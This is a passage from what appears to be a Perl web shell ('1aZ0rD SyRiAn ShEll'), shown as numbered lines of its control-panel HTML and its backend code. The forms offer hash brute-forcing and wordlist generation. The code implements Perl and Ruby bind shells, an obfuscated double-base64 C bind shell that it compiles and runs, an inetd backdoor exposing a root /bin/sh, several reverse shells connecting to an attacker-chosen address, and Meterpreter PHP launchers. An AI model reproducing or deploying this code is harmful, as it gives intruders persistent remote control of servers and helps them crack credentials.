2583. <input type="text" name="ip_r" id="commandLine4" value="$ENV{'REMOTE_ADDR'}" size="40">
2584. <input type="text" name="re_port" id="lport" onblur='Blur("lport","LPort")' onclick='Clear("lport","LPort")' value="LPort" size="40"></p>
2585. <p align="center"><input type="submit" value="OK"> </p>
2586. </td>
2587. </tr>
2588. </table>
2589. </form>
2590. </td>
2591. </tr>
2592. <tr>
2593. <!------ Brute-Force CraCk3r ------>
2594. <tr>
2595. <td width="30%" height="30">
2596. <form name="f5" method="POST" action= "?id=home" >
2597. <input type="hidden" name="action" value="Brute-Force">
2598. <table width="100%" height="72" border="0" id="Box">
2599. <tr>
2600. <td width="4%" height="21" style="background-color:$Color_1">&nbsp;</td>
2601. <td style="background-color:$Color_2;padding-left:10px;">Hashz Brute-Force
2602. CraCker</td>
2603. </tr>
2604. <tr>
2605. <td height="45" colspan="2">
2606. <p align="center"></p>
2607. <p align="center">&nbsp;Your Hash :
2608. <input type="text" name="hash" id="has" onblur='Blur("has","cfcd208495d565ef66e7dff9f98764da")' onclick='Clear("has","cfcd208495d565ef66e7dff9f98764da")' value="cfcd208495d565ef66e7dff9f98764da" size="40"></p>
2609. <p align="center">&nbsp;The Chars :
2610. <input type="text" name="char" id="cha" onblur='Blur("cha","aAdx")' onclick='Clear("cha","aAdx")' value="aAdx" size="40"></p>
2611. <p align="center">Mini count :
2612. <input type="text" name="mincount" id="commandLine4" value="4" size="40"></p>
2613. <p align="center">Max count :
2614. <input type="text" name="maxcount" id="commandLine4" value="5" size="40"></p>
2615. <p align="center"><select name="type">
2616. <option>How To Use</option>
2617. <option>MD5</option>
2618. <option>SHA1</option>
2619. <option>SHA-256</option>
2620. <option>SHA-384</option>
2621. </select>&nbsp;</p>
2622. <p align="center">&nbsp;<input type="submit" value="CraCk">
2623. </td>
2624. </tr>
2625. </table>
2626. </form>
2627. </td>
2628. <!------ SHA1 DeCoding ------>
2629. <td width="30%" height="30">
2630. <form name="f5" method="POST" action= "?id=home" >
2631. <input type="hidden" name="action" value="word">
2632. <table width="100%" height="72" border="0" id="Box">
2633. <tr>
2634. <td width="4%" height="21" style="background-color:$Color_1">&nbsp;</td>
2635. <td style="background-color:$Color_2;padding-left:10px;">Wordz List
2636. Creator</td>
2637. </tr>
2638. <tr>
2639. <td height="45" colspan="2">
2640. <p align="center"></p>
2641. <p align="center">File Name :
2642. <input type="text" name="file" id="wordlis" onblur='Blur("wordlis","pass.txt")' onclick='Clear("wordlis","pass.txt")' value="pass.txt" size="40"></p>
2643. <p align="center">The Chars : <input type="text" name="char" id="chas" onblur='Blur("chas","aAdx")' onclick='Clear("chas","aAdx")' value="aAdx" size="40"></p>
2644. <p align="center">Mini count :
2645. <input type="text" name="mincount" id="commandLine4" value="4" size="40"></p>
2646. <p align="center">Mini count :
2647. <input type="text" name="maxcount" id="commandLine4" value="5" size="40"></p><br>
2648. <p align="center"><input type="submit" value="Generate">
2649. </td>
2650. </tr>
2651. </table>
2652. </form>
2653. </td>
2654. <tr>
2655. <!-------EnD---->
2656. <sy><br> </table> <table bgcolor="#cccccc" width="100%">
2657. <tr>
2658. <td width="100%">[<a href="#top">TOP</a></sy>] <center>
2659. End
2660. CopyRight;
2661. ##############################################
2662. #-------------- [ Bind Port ] ---------------#
2663. ##############################################
2664. our ($c,$SHELL,$LISTEN_PORT,$protocol,$pid,$ruby,$GET_varetd,$p,$system,$target,$iaddr,$paddr,$proto,$sh,$exe);
2665. if ($bind_perl1 eq "ok")
2666. {
2667. use IO::Socket::INET;
2668. while($c=new IO::Socket::INET(LocalPort,$bind_port,Reuse,1,Listen)->accept){$~->fdopen($c,"w");print" ############################ \n ###### [ 1aZ0rD SH311] ##### \n ############################ \n";STDIN->fdopen($c,"r");system$_ while<>}
2669. }
2670. ##############################################
2671. #-------------- [ Bind Port 2]---------------#
2672. ##############################################
2673. if ($bind_perl2 eq "ok")
2674. {
2675. $SHELL="/bin/bash -i";
2676. $LISTEN_PORT=$bind_port;
2677. use Socket;
2678. $protocol=getprotobyname('tcp');
2679. socket(S,&PF_INET,&SOCK_STREAM,$protocol) || print "Cant create socket\n";
2680. setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
2681. bind(S,sockaddr_in($LISTEN_PORT,INADDR_ANY)) || print "Cant open port\n";
2682. listen(S,3) || print "Cant listen port\n";
2683. while(1)
2684. {
2685. accept(CONN,S);
2686. if(!($pid=fork))
2687. {
2688. print "Cannot fork" if (!defined $pid);
2689. open STDIN,"<&CONN";
2690. open STDOUT,">&CONN";
2691. open STDERR,">&CONN";
2692. print CONN " ############################ \n ###### [ 1aZ0rD SH311] ###### \n ############################ \n";
2693. system $SHELL || print CONN "Cant execute $SHELL\n";
2694. close CONN;
2695. exit 0;
2696. }
2697. }
2698. }
2699. ##############################################
2700. #------------ [ Bind Port Ruby ] ------------#
2701. ##############################################
2702. if ($bind_ruby eq "ok")
2703. {
2704. $ruby = `ruby -rsocket -e 'exit if fork;s=TCPServer.new("$bind_port");while(c=s.accept);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end;end'`;
2705. }
2706. ##############################################
2707. #------------- [ Bind Port C ] -------------#
2708. ##############################################
2709. if ($bind_c eq"ok")
2710. {
2711. use MIME::Base64;
2712. $port=$bind_port;
2713. $bind_c="STJsdVkyeDFaR1VnUEhOMFpHbHZMbWcrRFFvamFXNWpiSFZrWlNBOGMzUnlhVzVuTG1nK0RRb2phVzVqYkhWa1pTQThjM2x6TDNSNWNHVnpMbWcrRFFvamFXNWpiSFZrWlNBOGMzbHpMM052WTJ0bGRDNW9QZzBLSTJsdVkyeDFaR1VnUEc1bGRHbHVaWFF2YVc0dWFENE5DaU5wYm1Oc2RXUmxJRHhsY25KdWJ5NW9QZzBLYVc1MElHMWhhVzRvWVhKbll5eGhjbWQyS1EwS2FXNTBJR0Z5WjJNN0RRcGphR0Z5SUNvcVlYSm5kanNOQ25zZ0lBMEtJR2x1ZENCemIyTnJabVFzSUc1bGQyWmtPdzBLSUdOb1lYSWdZblZtV3pNd1hUc05DaUJ6ZEhKMVkzUWdjMjlqYTJGa1pISmZhVzRnY21WdGIzUmxPdzBLSUdsbUtHWnZjbXNvS1NBOVBTQXdLU0I3SUEwS0lISmxiVzkwWlM1emFXNWZabUZ0YVd4NUlEMGdRVVpmU1U1RlZEc05DaUJ5WlcxdmRHVXVjMmx1WDNCdmNuUWdQU0JvZEc5dWN5aGhkRzlwS0dGeVozWmJNVjBwS1RzTkNpQnlaVzF2ZEdVdWMybHVYMkZrWkhJdWMxOWhaR1J5SUQwZ2FIUnZibXdvU1U1QlJFUlNYMEZPV1NrN0lBMEtJSE52WTJ0bVpDQTlJSE52WTJ0bGRDaEJSbDlKVGtWVUxGTlBRMHRmVTFSU1JVRk5MREFwT3cwS0lHbG1LQ0Z6YjJOclptUXBJSEJsY25KdmNpZ2ljMjlqYTJWMElHVnljbTl5SWlrN0RRb2dZbWx1WkNoemIyTnJabVFzSUNoemRISjFZM1FnYzI5amEyRmtaSElnS2lrbWNtVnRiM1JsTENBd2VERXdLVHNOQ2lCc2FYTjBaVzRvYzI5amEyWmtMQ0ExS1RzTkNpQjNhR2xzWlNneEtRMEtJQ0I3RFFvZ0lDQnVaWGRtWkQxaFkyTmxjSFFvYzI5amEyWmtMREFzTUNrN0RRb2dJQ0JrZFhBeUtHNWxkMlprTERBcE93MEtJQ0FnWkhWd01paHVaWGRtWkN3eEtUc05DaUFnSUdSMWNESW9ibVYzWm1Rc01pazdEUW9nSUNCemVYTjBaVzBvSW1WamFHOGdkMlZzWTI5dFpTQjBieUJNWVZvd2NrUWdVM2xTYVVGdUlITm9aV3hzSUNZbUlDOWlhVzR2WW1GemFDQXRhU0lwT3cwS0lDQjlEUW9nZlEwS2ZRMEthVzUwSUdOb2NHRnpjeWhqYUdGeUlDcGlZWE5sTENCamFHRnlJQ3BsYm5SbGNtVmtLU0I3RFFwcGJuUWdhVHNOQ21admNpaHBQVEE3YVR4emRISnNaVzRvWlc1MFpYSmxaQ2s3YVNzcktTQU5DbnNOQ21sbUtHVnVkR1Z5WldSYmFWMGdQVDBnSjF4dUp5a05DbVZ1ZEdWeVpXUmJhVjBnUFNBblhEQW5PeUFOQ21sbUtHVnVkR1Z5WldSYmFWMGdQVDBnSjF4eUp5a05DbVZ1ZEdWeVpXUmJhVjBnUFNBblhEQW5PdzBLZlEwS2FXWWdLQ0Z6ZEhKamJYQW9ZbUZ6WlN4bGJuUmxjbVZrS1NrTkNuSmxkSFZ5YmlBd093MEtmUT09";
2714. $bind_c=decode_base64($bind_c);
2715. $bind_c=decode_base64($bind_c);
2716. $filename="bind.c";
2717. open (myfile,">>$filename");
2718. print myfile $bind_c ;
2719. close (myfile);
2720. if (-e "bind.c")
2721. {
2722. $a=`gcc -o bind bind.c`;
2723. $b=`chmod 777 bind`;
2724. $c=`./bind $port`;
2725. }
2726. else
2727. {
2728. $filename="tmp/bind.c";
2729. open (myfile,">>$filename");
2730. print myfile $bind_c ;
2731. close (myfile);
2732. $a=`gcc -o /tmp/bind /tmp/bind.c`;
2733. $b=`chmod 777 /tmp/bind`;
2734. $c=`cd /tmp;./bind $port`;
2735. }
2736. }
2737. ##############################################
2738. #------------ [ Bind Port inetd] ------------#
2739. ##############################################
2740. if ($bind_inetd eq "ok")
2741. {
2742. $GET_varetd=`cp /etc/services /tmp/.AllZyMoszsoFCfbHSgzAKWyRGvTdAjKE;echo drwgpabyl $bind_port/tcp>>/etc/services;echo drwgpabyl stream tcp nowait root /bin/sh sh>/tmp/.wMqiJSlKRTsmMAcHGATOfDStsjfUtRdO;inetd -s /tmp/.wMqiJSlKRTsmMAcHGATOfDStsjfUtRdO ||/usr/sbin/inetd -s /tmp/.wMqiJSlKRTsmMAcHGATOfDStsjfUtRdO ||/usr/etc/inetd -s /tmp/.wMqiJSlKRTsmMAcHGATOfDStsjfUtRdO;cp /tmp/.AllZyMoszsoFCfbHSgzAKWyRGvTdAjKE /etc/services;rm /tmp/.wMqiJSlKRTsmMAcHGATOfDStsjfUtRdO /tmp/.AllZyMoszsoFCfbHSgzAKWyRGvTdAjKE;`;
2743. }
2744. ##############################################
2745. #---------------- [ Revers ] ----------------#
2746. ##############################################
2747. if ($rev_perl1 eq "ok")
2748. {
2749. use IO::Socket::INET;
2750. $p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"$ip_r:$re_port");STDIN->fdopen($c,"r");print" ############################ \n ###### [ 1aZ0rD SH311] ##### \n ############################ \n";$~->fdopen($c,"w");system$_ while<>;
2751. }
2752. ##############################################
2753. #-------------- [ Revers PERL 2] ------------#
2754. ##############################################
2755. if ($rev_perl2 eq "ok")
2756. {
2757. use Socket;
2758. $cmd= "lynx";
2759. $system= 'echo Welcome To LaZ0rD SyRiAn ShEll;/bin/bash -i';
2760. $0=$cmd;
2761. $target=$ip_r;
2762. $port=$re_port;
2763. $iaddr=inet_aton($target) || print("Error: $!\n");
2764. $paddr=sockaddr_in($port, $iaddr) || print("Error: $!\n");
2765. $proto=getprotobyname('tcp');
2766. socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || print("Error: $!\n");
2767. connect(SOCKET, $paddr) || print("Error: $!\n");
2768. open(STDIN, ">&SOCKET");
2769. open(STDOUT, ">&SOCKET");
2770. open(STDERR, ">&SOCKET");
2771. system($system);
2772. close(STDIN);
2773. close(STDOUT);
2774. close(STDERR);
2775. }
2776. ##############################################
2777. #-------------- [ Revers PERL 3] ------------#
2778. ##############################################
2779. if ($rev_perl3 eq "ok")
2780. {
2781. use IO::Socket;
2782. $system = '/bin/bash -i';
2783. use FileHandle;
2784. socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or print "[-] Unable to Resolve Host\n";
2785. connect(SOCKET, sockaddr_in($re_port, inet_aton($ip_r))) or print "[-] Unable to Connect Host\n";
2786. SOCKET->autoflush();
2787. open(STDIN, ">&SOCKET");
2788. open(STDOUT,">&SOCKET");
2789. open(STDERR,">&SOCKET");
2790. system($system);
2791. }
2792. ##############################################
2793. #-------------- [ Revers Ruby] --------------#
2794. ##############################################
2795. if ($rev_ruby eq "ok")
2796. {
2797. $ruby =`ruby -rsocket -e 'exit if fork;c=TCPSocket.new("ip_r","$re_port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'`;
2798. }
2799. ##############################################
2800. #----------------- [ Revers Sh] -------------#
2801. ##############################################
2802. if ($rev_sh eq "ok")
2803. {
2804. $sh=`sh -c '(sleep 4560|telnet ip_r $re_port|while : ; do sh && break; done 2>&1|telnet ip_r $re_port >/dev/null 2>&1 &)'`;
2805. }
2806. ##############################################
2807. #------ [ Meterpreter Bind Connection ] -----#
2808. ##############################################
2809. if ($meter_bind eq"ok")
2810. {
2811. open (myfile,">>$filename");
2812. print myfile $meter_p;
2813. close (myfile);
2814. if (-e "meter.php")
2815. {
2816. $exe=`php -f meter.php`;
2817. }
2818. else
2819. {
2820. $filename="meter.php";
2821. open (myfile,">>$filename");
2822. print myfile $meter_p;
2823. close (myfile);
2824. $c=`cd /tmp;php -f meter.php`;
2825. }
2826. }
2827. ##############################################
2828. #----- [ Meterpreter Revers Connection ] ----#
2829. ##############################################
2830. if ($meter_re eq"ok")
2831. {
2832. open (myfile,">>$filename");
2833. print myfile $meter_p;
2834. close (myfile);
2835. if (-e "meter.php")
2836. {
2837. $exe=`php -f meter.php`;
2838. }
2839. else
2840. {
2841. $filename="meter.php";
2842. open (myfile,">>$filename");
2843. print myfile $meter_p;
2844. close (myfile);
2845. $c=`cd /tmp;php -f meter.php`;
2846. }
2847. }